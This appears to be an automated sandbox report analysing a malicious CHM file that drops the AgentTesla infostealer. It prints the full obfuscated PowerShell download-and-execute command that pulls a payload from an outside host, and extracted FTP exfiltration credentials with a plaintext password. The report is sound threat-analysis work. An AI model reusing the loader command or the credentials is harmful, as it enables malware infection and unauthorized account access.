Analysis
-
max time kernel
171s -
max time network
237s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
08-12-2022 08:13
Static task
static1
Behavioral task
behavioral1
Sample
mel9.chm
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
mel9.chm
Resource
win10v2004-20220901-en
General
-
Target
mel9.chm
-
Size
13KB
-
MD5
e7a3bc55f52eebb6ce7df0a0047fec40
-
SHA1
b152e0d6abc8dab4500aaa4161dac968e54cad20
-
SHA256
908d78eb614a8ecf652163a4ccbdf62deec33d03747d4342d4f90e5bcf7995d8
-
SHA512
3537fee98df7a02510e65c4a7fbe302e154d37e5ea497fe2677936f3442afc565a4a6307a870971ca3f45a8d25bee50b71a04c515664737cbe72d4031a186a81
-
SSDEEP
192:8FYhJztroZ7rRXcAU9aoSpW9KZYtsufMCKv6:gYjtroZ7rAv9yYtsuFKv
Malware Config
Extracted
https://cricot2.kylos.pl/mel9.txt
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.peva.it - Port:
21 - Username:
anita@peva.it - Password:
Team2318!@#
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 12 3400 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
powershell.exepid process 3400 powershell.exe 3400 powershell.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3400 set thread context of 4140 3400 powershell.exe RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeRegAsm.exepid process 3400 powershell.exe 3400 powershell.exe 4140 RegAsm.exe 4140 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
powershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 3400 powershell.exe Token: SeIncreaseQuotaPrivilege 3400 powershell.exe Token: SeSecurityPrivilege 3400 powershell.exe Token: SeTakeOwnershipPrivilege 3400 powershell.exe Token: SeLoadDriverPrivilege 3400 powershell.exe Token: SeSystemProfilePrivilege 3400 powershell.exe Token: SeSystemtimePrivilege 3400 powershell.exe Token: SeProfSingleProcessPrivilege 3400 powershell.exe Token: SeIncBasePriorityPrivilege 3400 powershell.exe Token: SeCreatePagefilePrivilege 3400 powershell.exe Token: SeBackupPrivilege 3400 powershell.exe Token: SeRestorePrivilege 3400 powershell.exe Token: SeShutdownPrivilege 3400 powershell.exe Token: SeDebugPrivilege 3400 powershell.exe Token: SeSystemEnvironmentPrivilege 3400 powershell.exe Token: SeRemoteShutdownPrivilege 3400 powershell.exe Token: SeUndockPrivilege 3400 powershell.exe Token: SeManageVolumePrivilege 3400 powershell.exe Token: 33 3400 powershell.exe Token: 34 3400 powershell.exe Token: 35 3400 powershell.exe Token: 36 3400 powershell.exe Token: SeIncreaseQuotaPrivilege 3400 powershell.exe Token: SeSecurityPrivilege 3400 powershell.exe Token: SeTakeOwnershipPrivilege 3400 powershell.exe Token: SeLoadDriverPrivilege 3400 powershell.exe Token: SeSystemProfilePrivilege 3400 powershell.exe Token: SeSystemtimePrivilege 3400 powershell.exe Token: SeProfSingleProcessPrivilege 3400 powershell.exe Token: SeIncBasePriorityPrivilege 3400 powershell.exe Token: SeCreatePagefilePrivilege 3400 powershell.exe Token: SeBackupPrivilege 3400 powershell.exe Token: SeRestorePrivilege 3400 powershell.exe Token: SeShutdownPrivilege 3400 powershell.exe Token: SeDebugPrivilege 3400 powershell.exe Token: SeSystemEnvironmentPrivilege 3400 powershell.exe Token: SeRemoteShutdownPrivilege 3400 powershell.exe Token: SeUndockPrivilege 3400 powershell.exe Token: SeManageVolumePrivilege 3400 powershell.exe Token: 33 3400 powershell.exe Token: 34 3400 powershell.exe Token: 35 3400 powershell.exe Token: 36 3400 powershell.exe Token: SeDebugPrivilege 4140 RegAsm.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 4972 hh.exe 4972 hh.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
hh.exepowershell.exedescription pid process target process PID 4972 wrote to memory of 3400 4972 hh.exe powershell.exe PID 4972 wrote to memory of 3400 4972 hh.exe powershell.exe PID 3400 wrote to memory of 4140 3400 powershell.exe RegAsm.exe PID 3400 wrote to memory of 4140 3400 powershell.exe RegAsm.exe PID 3400 wrote to memory of 4140 3400 powershell.exe RegAsm.exe PID 3400 wrote to memory of 4140 3400 powershell.exe RegAsm.exe PID 3400 wrote to memory of 4140 3400 powershell.exe RegAsm.exe PID 3400 wrote to memory of 4140 3400 powershell.exe RegAsm.exe PID 3400 wrote to memory of 4140 3400 powershell.exe RegAsm.exe PID 3400 wrote to memory of 4140 3400 powershell.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\mel9.chm1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://cricot2.kylos.pl/mel9.txt')|P2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\6fa7e56d-5a67-4728-a5db-c67fd5cf7763\AgileDotNetRT64.dllFilesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
C:\Users\Admin\AppData\Local\Temp\f1c816ee-9c5b-4ee5-8939-4ab00a42e9d3\AgileDotNetRT64.dllFilesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
memory/3400-142-0x00007FF946430000-0x00007FF946EF1000-memory.dmpFilesize
10.8MB
-
memory/3400-135-0x00007FF946430000-0x00007FF946EF1000-memory.dmpFilesize
10.8MB
-
memory/3400-137-0x00007FF9416B0000-0x00007FF9417FE000-memory.dmpFilesize
1.3MB
-
memory/3400-134-0x00000286BC340000-0x00000286BC362000-memory.dmpFilesize
136KB
-
memory/3400-133-0x0000000000000000-mapping.dmp
-
memory/4140-139-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/4140-140-0x0000000000437A7E-mapping.dmp
-
memory/4140-141-0x0000000005780000-0x0000000005D24000-memory.dmpFilesize
5.6MB
-
memory/4140-143-0x0000000005390000-0x000000000542C000-memory.dmpFilesize
624KB
-
memory/4140-144-0x0000000006070000-0x00000000060D6000-memory.dmpFilesize
408KB
-
memory/4140-145-0x0000000006530000-0x0000000006580000-memory.dmpFilesize
320KB
-
memory/4140-146-0x00000000066A0000-0x0000000006732000-memory.dmpFilesize
584KB
-
memory/4140-147-0x00000000068B0000-0x00000000068BA000-memory.dmpFilesize
40KB